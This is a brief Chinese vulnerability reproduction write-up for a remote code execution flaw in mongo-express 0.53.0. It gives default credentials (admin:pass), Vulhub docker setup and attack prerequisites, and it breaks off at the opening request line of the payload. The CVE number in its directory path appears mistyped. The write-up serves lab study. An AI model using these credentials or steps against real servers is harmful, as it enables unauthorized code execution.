漏洞描述
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!
mongo-express是一款mongodb的第三方Web界面,使用node和express开发。
如果攻击者可以成功登录,或者目标服务器没有修改默认的账号密码(admin:pass
),则可以执行任意node.js代码。
参考链接:https://blog.csdn.net/whatday/article/details/106751138
参考链接:https://www.cnblogs.com/null1433/p/12740333.html
影响版本
1 | mongo-express 0.53.0 |
环境搭建
1. docker搭建;
1 | cd /vulhub/mongo-express/CVE-2019-107585 |
访问 http://xxx.xxx.xxx.xxx:8081/ 正常即可;
漏洞复现
前提条件
1.知道Mongo的账号密码,或者未授权
命令执行
任意命令执行payload如下:
1 | POST /checkValid HTTP/1.1 |